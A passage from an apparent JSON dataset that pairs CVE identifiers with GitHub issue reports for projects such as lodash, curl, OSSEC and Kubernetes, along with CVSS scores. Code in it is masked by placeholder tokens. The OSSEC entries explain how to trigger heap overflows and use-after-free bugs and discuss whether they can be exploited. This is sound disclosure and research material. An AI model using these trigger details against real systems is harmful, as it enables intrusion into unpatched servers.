        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8116",
        "Issue_Url_old": "https://github.com/sindresorhus/dot-prop/issues/63",
        "Issue_Url_new": "https://github.com/sindresorhus/dot-prop/issues/63",
        "Repo_new": "sindresorhus/dot-prop",
        "Issue_Created_At": "2020-08-12T09:55:49Z",
        "description": "Please backport CVETAG security fix to NUMBERTAG Based on the severity of CVETAG URLTAG and the fact that NUMBERTAG is still very commonly used as a dependency, I would like to kindly request for the fix URLTAG to be backported to NUMBERTAG and released as (presumably NUMBERTAG Would this be possible? Many thanks in advance.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8203",
        "Issue_Url_old": "https://github.com/lodash/lodash/issues/4874",
        "Issue_Url_new": "https://github.com/lodash/lodash/issues/4874",
        "Repo_new": "lodash/lodash",
        "Issue_Created_At": "2020-07-24T03:51:51Z",
        "description": "CVETAG is not modified in FILETAG . URLTAG issue: URLTAG description: the issue is modified in FILETAG since NUMBERTAG but not modified util APITAG Could anyone modify it? Thanks~",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-8203",
        "Issue_Url_old": "https://github.com/lodash/lodash/issues/4744",
        "Issue_Url_new": "https://github.com/lodash/lodash/issues/4744",
        "Repo_new": "lodash/lodash",
        "Issue_Created_At": "2020-04-30T02:52:25Z",
        "description": "Prototype pollution attack in APITAG Affects: lodash NUMBERTAG and below. By including APITAG in the path of objects to zip, APITAG can be polluted. This particularly affects beginning the path with APITAG which pollutes the global scope. This vulnerability was disclosed two days ago: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.4,
        "impactScore": 5.2,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-8285",
        "Issue_Url_old": "https://github.com/curl/curl/issues/6255",
        "Issue_Url_new": "https://github.com/curl/curl/issues/6255",
        "Repo_new": "curl/curl",
        "Issue_Created_At": "2020-11-27T09:33:17Z",
        "description": "Stack overflow in libcurl when CURLOPT_WILDCARDMATCH is in use. ERRORTAG The reason is about NUMBERTAG files in the directory. libcurl version NUMBERTAG compiler: VS NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8296",
        "Issue_Url_old": "https://github.com/nextcloud/server/issues/17439",
        "Issue_Url_new": "https://github.com/nextcloud/server/issues/17439",
        "Repo_new": "nextcloud/server",
        "Issue_Created_At": "2019-10-07T11:19:59Z",
        "description": "Oc_credentials security?. Hi, Can i get informations about the algorithm used to hash password inside oc_credentials. I think this is synchronous hash because nextcloud need it with external storage but i\u2019m not sure ? Best regards",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.7,
        "impactScore": 5.9,
        "exploitabilityScore": 0.8
    },
    {
        "CVE_ID": "CVE-2020-8440",
        "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/10",
        "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/10",
        "Repo_new": "niteosoft/simplejobscript",
        "Issue_Created_At": "2020-01-19T13:19:49Z",
        "description": "FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8442",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1821",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1821",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:02:37Z",
        "description": "OSSEC HIDS Security Audit Findings. Hi folks, I spent some free time recently auditing OSSEC. I was primarily focused on a threat model where an OSSEC agent is compromised (e.g. the agent key and assoc. counters are known) and used to attack the OSSEC server (primarily APITAG and APITAG ). Given the problem domain of OSSEC and HIDS generally I think this is fair game. I found a handful of bugs and have done my best to address the root cause, the affected versions, the impact and potential fixes in the issues I've filed. I will request CVEs for the security relevant bugs later on. In terms of rough risk levels I'd categorize the findings as follows: Informational: os_regex empty pcre2 off by one URLTAG rootcheck check rc if shell injection risk URLTAG Low: analysisd syscheck decoder msg location path injection URLTAG analysisd APITAG allows control chars in msg URLTAG analysisd APITAG bad location segfault URLTAG Med: analysisd APITAG off by one syslog URLTAG analysisd APITAG use after free ossecalert URLTAG analysisd APITAG use after free syscheck URLTAG analysisd syscheck decoder off by one read URLTAG High: analysisd rootcheck decoder heap overflow URLTAG Some caveats/context to add NUMBERTAG I'm not a professional C coder, w.r.t suggested fixes YMM NUMBERTAG I don't write exploits for a living. My assessments of exploitability/risk should be considered lower bounds NUMBERTAG This wasn't an extensive audit. I followed my nose and used some fuzzing NUMBERTAG OSSEC NUMBERTAG seems to be the earliest tag in the Github repo. I didn't dig deeper into history to see if any of these bugs affect older releases (some likely do). If you would be interested in trying to adopt fuzzing as part of your CI (or as an integration with oss fuzz, etc) I'd be happy to try and provide some notes but likely don't have the resources to implement it myself to a merge able standard of work. Thanks! You can close this top level issue as you see appropriate.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8442",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1820",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1820",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:01:47Z",
        "description": "analysisd rootcheck decoder: heap overflow in APITAG The APITAG rootcheck decoder ( APITAG ) allocates two fixed size heap buffers via global static vars. One, APITAG is an array of APITAG size APITAG . The other APITAG is an array of APITAG , also size APITAG . In a default build MAX_AGENTS is NUMBERTAG URLTAG When processing rootcheck messages the APITAG function is called to find a file pointer for the given agent name. In APITAG a while loop with a index counter i is used to try and find an index of APITAG that matches the provided agent name. No check of i is made to ensure that it stays within the bound of APITAG , resulting in a straight forward heap buffer overflow when more than APITAG syscheck update messages for distinct agent names are processed. This code was introduced in the original rootcheck functionality with APITAG on Oct NUMBERTAG I believe it affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write MAX_AGENT rootcheck update messages with distinct message agent names. While APITAG always sets the agent name portion of messages passed on to APITAG with a prefix out of the attackers control based on the agent key and src IP ( APITAG ) the portion after this prefix is attacker controlled and thus can be mutated to make more than MAX_AGENT unique names that will be decoded by the APITAG . Notably this bug has fairly high potential for exploitation. The attacker is able to overwrite a FILE pointer with a pointer to the agent name, which is mostly attacker controlled (minus a short prefix), and can be up to NUMBERTAG strlen(prefix) bytes long. I'm definitely able to reliably segfault the APITAG process with this bug though I was personally unable to reliable control of execution. Overwriting a FILE pointer with a pointer to attacker controlled data is a common way to achieve reliably code execution. There are many pointers in the FILE struct to be abused and while libc has added some hardening it isn't applicable for versions NUMBERTAG or lower (e.g. Ubuntu NUMBERTAG and bypass techniques are well known. URLTAG URLTAG URLTAG In this case there are two additional challenges to exploiting the bug that stumped me but may not stump someone who is actually good at writing exploits NUMBERTAG Since the protocol is all string based you can't use a null byte in payload that overwrites the FILE contents which makes specifying valid pointers on NUMBERTAG ery challenging. APITAG get one terminating NUMBERTAG at the end of your payload which can be used for the high order byte of a pointer, but it's still a challenge to find useful targets in high mem NUMBERTAG Getting your overwritten APITAG entry used with fseek requires being able to specify the APITAG name at the matching i value. Usually this is the first bytes of a valid FILE and so I _think_ the attacker needs full control of the agent name to be able to specify a match (usually APITAG or similar. The value is predictable based on rootcheck's open flags). If I'm correct this might mean the segfault is remotely triggerable but exploiting the FILE overwrite may not be. To fix this the while conditions in APITAG and APITAG should be rewritten to short circuit if APITAG : E.g. instead of: APITAG Use: APITAG I think it's worth noting that this bug is nearly identical to the one reported by Paul Southerington in the syscheck decoder, patched in Feb NUMBERTAG URLTAG It has looks like this was fixed in OSSEC's Wazuh's fork at some point, though potentially without realizing it fixed a vulnerability: URLTAG This seems like a place where process improvement could help. Receiving vulnerability reports should trigger a search through the codebase for equivalent problems.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8443",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1816",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1816",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:00:33Z",
        "description": "analysisd: APITAG off by one heap overflow cleaning syslog msgs.. In APITAG the APITAG function performs pattern matching and if applicable, tries to decode syslog messages to populate some lf structure fields according to the syslog data. URLTAG When a message contains leading text matching the patterns expected for syslog, and contains a substring like APITAG in the correct location APITAG will attempt to remove it by advancing the APITAG pointer beyond the end of the substring: URLTAG The code is careful about checking the result from strstr when advancing to the expected closing APITAG , however it makes an assumption that there must be a non null character following the APITAG when it subsequently advances the pieces pointer by NUMBERTAG URLTAG If a message like APITAG is processed APITAG will advance beyond the terminating null byte of APITAG , resulting in a heap overflow when operating on the APITAG pointer subsequently during decoding. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . This is triggerable via an authenticated client through the APITAG . The client needs only write a message to the remote server of any queue type that will match the expected syslog format and authority substring, but end immediately after the APITAG . I think the best fix is to change the pieces pointer to be incremented by NUMBERTAG instead of NUMBERTAG or to update the strstr check for APITAG instead of just APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8444",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1817",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1817",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:00:51Z",
        "description": "analysisd: APITAG heap use after free with ossec alert msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a received message from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any messages that meet the ossec alert decoder's criteria are given to that decoder for further processing. After processing an ossec alert msg from a client the ossec alert decoder will free the APITAG pointer at the end of its processing, replacing it with a new pointer and populating APITAG : URLTAG Though the APITAG function returns NULL and not APITAG further rule processing of the lf struct occurs during APITAG because of the APITAG set by the decoder before freeing APITAG . URLTAG If any subsequent processing associated with the generated rule accesses the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing the APITAG . I believe the bug was introduced in APITAG on July NUMBERTAG and affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write a ossecalert message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the ossecalert decoder to APITAG the APITAG and APITAG before freeing APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8445",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1814",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1814",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T20:59:57Z",
        "description": "analysisd: APITAG allows control characters in msg.. The APITAG 's APITAG function doesn't remove or encode terminal control charters or newlines from processed log messages. In many cases those control characters/newline are later logged. There have been cases where allowing arbitrary control characters in log messages has led to command execution with specific terminal emulator implementations. As a result many pieces of software (e.g. Apache HTTPD URLTAG have added escaping of control characters in log messages. It may also be possible to abuse terminal control characters to hide previous messages in a log, tricking system administrators into missing events. Similarly, because newlines ( APITAG ) are permitted in messages processed by APITAG it may be possible to inject nested events to the ossec log. This may result in system administrators being tricked into thinking alerts fired that did not.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8446",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1813",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1813",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T20:59:40Z",
        "description": "analysisd: syscheck decoder location path injection.. The APITAG 's syscheck decoder ( APITAG ) performs unsafe path handling using the received agent name when trying to get the agent file. The APITAG function uses the agent name unsanitized when building a file name to be used with fopen . URLTAG Processing a syscheck message like APITAG from an agent named test sending from localhost results in an open for APITAG This will fail with ENOTDIR because the part of the path the attacker can't control remotely ( APITAG ) is not a directory. Creating it first by sending a message like APITAG seems like a potential solution at first but won't work because while the file APITAG will be created it won't be created as a directory but a regular file. I suspect this means that the bug is only useful to local attackers (that can write directly to the ossec queue). Writing directly to the queue allows full control of the APITAG used as the agent argument to fopen and can cause the syscheck DB file to be created in an attacker controlled location within the chroot . Remote attackers can not control the full APITAG since the APITAG ensures the prefix of agent name and source IP is always present. Likely the best fix is to use the APITAG function from APITAG on the location filed populated by APITAG and rejecting any values that have a APITAG return from that function.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8447",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1818",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1818",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:01:03Z",
        "description": "analysisd: APITAG heap use after free decoding syscheck msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a message read from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any syscheck messages are given to the syscheck decoder for further processing. After processing a syscheck msg from a client the syscheck decoder will free the APITAG pointer in two places. One place is if the message indicated a change in an existing tracked file: URLTAG Another place is if the message indicated a new file to track: URLTAG In both cases the syscheck decoder replaces the existing APITAG and APITAG pointers with pointers to new messages after first freeing the old APITAG . Afterwards the APITAG , and APITAG functions return NUMBERTAG to APITAG . Since the decoder returned NUMBERTAG the APITAG function will continue processing the event, it will not jump to CLMEM : URLTAG If any subsequent processing rules access the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing APITAG . I believe the bug was introduced in APITAG on No NUMBERTAG and affects OSSEC NUMBERTAG This code path is triggerable via an authenticated client through the APITAG . The client needs only write a valid syscheck message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the syscheck decoder to APITAG the APITAG and APITAG before freeing APITAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-8448",
        "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1815",
        "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1815",
        "Repo_new": "ossec/ossec-hids",
        "Issue_Created_At": "2020-01-15T21:00:12Z",
        "description": "analysisd: APITAG segfault processing invalid msg location.. In APITAG the APITAG 's APITAG function handles the location portion of a message differently when the first character after a NUMBERTAG digit ID is APITAG , indicating it came from a remote agent via APITAG . When remote agent locations are processed APITAG tries to null terminate the received location substring of the overall log message to store in APITAG by advancing past the APITAG in the string to the first APITAG character: URLTAG Unfortunately the nesting of strstr as the first argument to strchr on L NUMBERTAG doesn't account for the possibility of a location string that starts with APITAG but doesn't contain a APITAG . E.g. processing the msg APITAG will result in the strstr returning NULL, meaning the strchr call will be APITAG and a segfault will occur. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . It seems that in all cases APITAG will always write a well formed location into the message it writes to the ossec UNIX domain socket queue because it uses APITAG and populates the locmsg unconditionally: URLTAG URLTAG I believe that means the only way this is triggerable is with direct write access to the socket, and probably makes the exploitability very low. One possible fix is to separate the strstr and return an error when it returns NULL before performing the subsequent strchr with the result pointer.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8548",
        "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/44",
        "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/44",
        "Repo_new": "antonreshetov/massCode",
        "Issue_Created_At": "2020-02-02T05:49:29Z",
        "description": "RCE in APITAG Describe the bug You can use masscode to render the document in markdown but it failed to protect itself from cross site script attacks (XSS). Further, it has been identified that in APITAG flag APITAG is set to true which leads to remote code execution issue in masscode Expected behaviour It should not execute APITAG code while rendering the document in markdown Screenshots URLTAG Environment Version NUMBERTAG alpha NUMBERTAG OS version and name: windows NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8548",
        "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/43",
        "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/43",
        "Repo_new": "antonreshetov/massCode",
        "Issue_Created_At": "2020-02-01T19:04:27Z",
        "description": "Vulnerability report please contact. Hello, I would like to report a security bug in APITAG Can you please contact me on nikhil. EMAILTAG Best regards, Nikhil",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8551",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89377",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89377",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-03-23T18:34:40Z",
        "description": "CVETAG : Kubelet APITAG via API. CVSS Rating: PATHTAG URLTAG APITAG The Kubelet has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read only API typically served on port NUMBERTAG and the authenticated HTTPS API typically served on port NUMBERTAG Am I vulnerable? If an attacker can make a request to an unpatched kubelet, then you may be vulnerable to this. Affected Versions kubelet NUMBERTAG kubelet NUMBERTAG kubelet NUMBERTAG How do I mitigate this vulnerability? Limit access to the Kubelet API or patch the Kubelet. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Henrik Schmidt /area security /kind bug /committee product security /sig node /area kubelet",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8552",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89378",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89378",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-03-23T18:35:34Z",
        "description": "CVETAG : apiserver APITAG (oom). CVSS Rating: PATHTAG URLTAG APITAG The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to NUMBERTAG this was possible via unauthenticated requests by default. Affected Versions kube apiserver NUMBERTAG kube apiserver NUMBERTAG kube apiserver NUMBERTAG How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: Preventing unauthenticated or unauthorized access to all apis The apiserver should auto restart if it OOMs Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Gus Lees APITAG /area security /kind bug /committee product security /sig api machinery",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8553",
        "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/5126",
        "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/5126",
        "Repo_new": "kubernetes/ingress-nginx",
        "Issue_Created_At": "2020-02-19T19:00:32Z",
        "description": "CVETAG : auth type basic annotation vulnerability. A security issue was discovered in ingress nginx versions older than NUMBERTAG The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. Am I vulnerable? The vulnerability exists only if the annotation APITAG type: basic URLTAG is used. How do I upgrade? Follow installation instructions here URLTAG Vulnerability Details A vulnerability has been discovered where a malicious user could create a new Ingress definition resulting in the replacement of the password file. The vulnerability requires that the victim namespace and/or secret use a hyphen in the name. This scenario requires privileges in the cluster to create and read ingresses and also create secrets. This issue is filed as CVETAG . /close",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 5.2,
        "exploitabilityScore": 0.7
    },
    {
        "CVE_ID": "CVE-2020-8554",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97076",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97076",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-12-04T20:02:15Z",
        "description": "RESERVED. Reserved for CVE.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-8554",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97110",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/97110",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-12-07T17:47:04Z",
        "description": "Figure out what to do about external IPs. For CVETAG , URLTAG we decided we couldn't patch it in tree, and instead provided workarounds to disable (or allowlist) the feature through admission controls. Now that the issue is public, I'd like to open the conversation about a long term fix. Unless we missed something (entirely possible), I see a few possible paths forward NUMBERTAG Decide to stop supporting external IPs, deprecate and eventually remove the feature NUMBERTAG Attempt to redesign the external IP feature, deprecate the old behavior, and manage the migration to the new feature NUMBERTAG Accept the current state, and promote the externalip webhook URLTAG to a built in admission controller NUMBERTAG Accept the current state, and support the externalip webhook URLTAG as a long term solution /sig network architecture /area security /priority important soon",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.0,
        "impactScore": 3.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-8555",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/91542",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/91542",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-05-28T16:13:34Z",
        "description": "Placeholder issue. Placeholder issue, please do not delete.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.3,
        "impactScore": 4.0,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8557",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/93032",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/93032",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-07-13T18:39:08Z",
        "description": "Placeholder issue. Placeholder issue, please do not delete.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8558",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92315",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92315",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-06-19T18:38:58Z",
        "description": "Placeholder issue. Placeholder issue, please do not delete.",
        "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-8559",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/92914",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/92914",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-07-08T17:03:16Z",
        "description": "[RESERVED]. This issue is reserved for a future vulnerability announcement. /close",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.8,
        "impactScore": 5.9,
        "exploitabilityScore": 0.9
    },
    {
        "CVE_ID": "CVE-2020-8561",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/104720",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/104720",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-09-01T20:18:50Z",
        "description": "TITLE: PLACEHOLDER ISSUE. /triage accepted /lifecycle frozen /area security /kind bug /committee security response",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.1,
        "impactScore": 1.4,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-8562",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/101493",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/101493",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2021-04-26T19:18:04Z",
        "description": "PLACEHOLDER ISSUE. /area security /kind bug /committee product security /lifecycle frozen",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N",
        "severity": "LOW",
        "baseScore": 3.1,
        "impactScore": 1.4,
        "exploitabilityScore": 1.6
    },
    {
        "CVE_ID": "CVE-2020-8563",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95621",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95621",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-10-15T22:00:44Z",
        "description": "CVETAG : Secret leaks in kube controller manager when using APITAG provider. CVSS Rating NUMBERTAG PATHTAG APITAG In Kubernetes clusters using APITAG as a cloud provider, with a logging level set to NUMBERTAG or above, APITAG cloud credentials will be leaked in the cloud controller manager's log. Am I vulnerable? If you are using APITAG as a cloud provider, have verbose logging enabled, and an attacker can access cluster logs, then you may be vulnerable to this. Affected Versions kube controller manager NUMBERTAG How do I mitigate this vulnerability? Do not enable verbose logging in production, limit access to cluster logs. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Kaizhe Huang (derek NUMBERTAG area security /kind bug /committee product security",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-8564",
        "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/95622",
        "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/95622",
        "Repo_new": "kubernetes/kubernetes",
        "Issue_Created_At": "2020-10-15T22:03:19Z",
